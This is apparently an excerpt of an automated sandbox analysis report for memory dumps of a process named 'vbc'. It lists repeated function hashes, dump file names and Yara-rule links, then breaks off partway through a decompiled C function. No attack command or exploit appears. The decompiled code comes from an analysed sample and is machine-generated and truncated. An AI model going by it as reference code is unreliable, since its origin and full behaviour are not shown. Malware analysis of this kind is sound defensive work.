Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00A00060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 00A001D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 00A0010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A01148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 00A007AC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 009FF8CC, Relevance: .0, Instructions: 6COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00A01930, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 009FF938, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947

Uniqueness

Uniqueness Score: -1.00%

Function 009FFAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 009FFA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 009FFBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 009FFB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009FFC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00A00C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 00A01D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 009FFD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009FFE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 009FFFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2225070675.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000006.00000002.2225066697.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225142574.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225148135.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225152637.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225156521.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225160401.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2225192623.0000000000B50000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 00A28788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A28788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
